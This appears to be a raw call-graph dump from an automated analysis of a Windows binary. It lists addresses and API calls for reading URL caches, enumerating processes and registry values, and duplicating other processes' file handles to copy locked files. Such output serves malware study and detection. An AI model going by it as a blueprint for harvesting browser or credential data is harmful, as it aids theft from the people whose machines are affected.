38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 ??3@YAXPAX 38059->38060 38061 40ea88 38060->38061 38062 40aa04 ??3@YAXPAX 38061->38062 38063 40ea90 38062->38063 38064 40aa04 ??3@YAXPAX 38063->38064 38065 40ea98 38064->38065 38066 40aa04 ??3@YAXPAX 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 ??3@YAXPAX 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 ??3@YAXPAX 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab ??3@YAXPAX ??3@YAXPAX 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab ??3@YAXPAX ??3@YAXPAX 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab ??3@YAXPAX ??3@YAXPAX 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab ??3@YAXPAX ??3@YAXPAX 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab ??3@YAXPAX ??3@YAXPAX 38382->38778 38384 40c788 38779 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38779 38386 40c790 38780 40b1ab ??3@YAXPAX ??3@YAXPAX 38386->38780 38388 40c798 38389 40aa04 ??3@YAXPAX 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 _wcsncoll 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab ??3@YAXPAX ??3@YAXPAX 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab ??3@YAXPAX ??3@YAXPAX 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 ??3@YAXPAX 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf ??3@YAXPAX 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab ??3@YAXPAX ??3@YAXPAX 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 ??3@YAXPAX 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 ??3@YAXPAX 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab ??3@YAXPAX ??3@YAXPAX 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 ??3@YAXPAX 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab ??3@YAXPAX ??3@YAXPAX 38880->38932 38881->38880 38883 40b633 ??3@YAXPAX 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX ??3@YAXPAX 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 ??3@YAXPAX 38923->38925 38926 40aa04 ??3@YAXPAX 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 